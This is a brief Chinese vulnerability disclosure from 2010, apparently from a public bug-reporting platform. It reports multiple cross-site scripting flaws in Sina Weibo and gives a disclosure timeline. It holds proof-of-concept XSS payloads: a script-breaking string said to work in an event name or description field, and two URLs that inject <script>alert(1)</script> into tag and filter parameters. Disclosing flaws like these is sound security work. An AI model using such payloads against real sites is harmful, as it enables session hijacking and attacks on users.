漏洞详情
披露状态:
2010-07-16: 细节已通知厂商并且等待厂商处理中
2010-08-18: 细节向公众公开
简要描述:
新浪微博多处粉严重的XSS,尽快修复吧
详细说明:
同城活动那里是有xss的,名称还是简介那里忘记了";alert(1);//你们再测下吧,今天不让发活动了- -次数限制太严格了……
漏洞证明:
http://t.sina.com.cn/pub/tags/%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E
http://t.sina.com.cn/pub/news?filter[]=100&filter[]=99&filter[]=0&filter[]=5"><script>alert(1)</script><"&filter[]=4&&page=2